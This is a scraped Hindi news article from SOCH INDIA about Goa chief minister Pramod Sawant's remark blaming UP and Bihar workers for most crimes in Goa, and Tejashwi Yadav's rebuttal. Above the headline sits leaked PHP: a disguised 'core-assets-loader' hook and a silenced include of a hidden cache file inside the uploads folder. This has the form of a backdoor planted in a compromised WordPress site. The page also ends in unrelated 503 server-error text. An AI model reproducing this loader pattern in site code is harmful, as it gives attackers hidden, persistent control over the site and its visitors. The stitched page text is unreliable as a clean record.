add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Pramod Sawant Remark: ‘यूपी-बिहार के मजदूर गोवा में…’, सीएम प्रमोद सावंत ने दिया ये बयान तो भड़के तेजस्वी यादव – SOCH INDIA
Menu

देश
Pramod Sawant Remark: ‘यूपी-बिहार के मजदूर गोवा में…’, सीएम प्रमोद सावंत ने दिया ये बयान तो भड़के तेजस्वी यादव

nobanner

गोवा के मुख्यमंत्री प्रमोद सावंत ने विवादित बयान देते हुए कहा कि उत्तर प्रदेश और बिहार के 90 प्रतिशत मजदूर गोवा में अपराधों को अंजाम देते हैं. उनकी इस टिप्पणी पर बवाल मच गया है. बिहार के उपमुख्यमंत्री तेजस्वी यादव ने पलटवार करते हुए पूछा है कि बीजेपी और बीजेपी नेताओं को बिहार और बिहारियों से नफरत क्यों है?

दरअसल, 1 मई मजदूर दिवस के दिन पणजी में प्रमोद सावंत ने दावा किया था, “बाहर के मजदूर गोवा में गुनाह करते हैं और फरार हो जाते हैं अगर हम अनुपात निकालें तो जो भी गुनाह होते हैं उसमें से 90 फ़ीसदी गुनाहगार बाहर के होते हैं यूपी, बिहार के होते हैं, इसलिए पहचान पत्र जरूरी है जिससे अपराधी को पकड़ा जा सके.” गोवा सीएम के इस दावे पर तेजस्वी सख्त प्रतिक्रिया दी है.

क्या बोले तेजस्वी?

उन्होंने सोशल मीडिया प्लेटफॉर्म ट्विटर पर लिखा, “केंद्रीय मंत्री पीयूष गोयल जी के बाद अब गोवा के मुख्यमंत्री प्रमोद सावंत ने शर्मनाक बयान देकर बिहार और बिहारियों का घोर अपमान किया है. बीजेपी और बीजेपी के नेताओं को बिहार और बिहारियों से नफरत क्यों है? केंद्र की बीजेपी सरकार बिहार के सभी हकों, वाजिब मांगों व अधिकारों को लेकर सदा नकारात्मक और उदासीन क्यों रहती है?”

सीएम सावंत का पूरा बयान

मुख्यमंत्री प्रमोद सावंत ने मजदूर दिवस पर कहा था, “सभी मजदूरों के पास लेबर कार्ड हो, इसके लिए राज्य सरकार दो गैर सरकारी संगठनों के साथ मिलकर काम कर रही है. जल्द मजदूरों के कार्ड के लिए ऑनलाइन सुविधा भी शुरू की जाएगी. जब सभी मजदूरों को कार्ड जारी हो जाएंगे तो उनके डेटाबेस तक पहुंचना आसान हो जाएगा. इससे पुलिस को मामलों की जांच करने और आरोपियों को ट्रैक करने में भी मदद मिलेगी.”

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.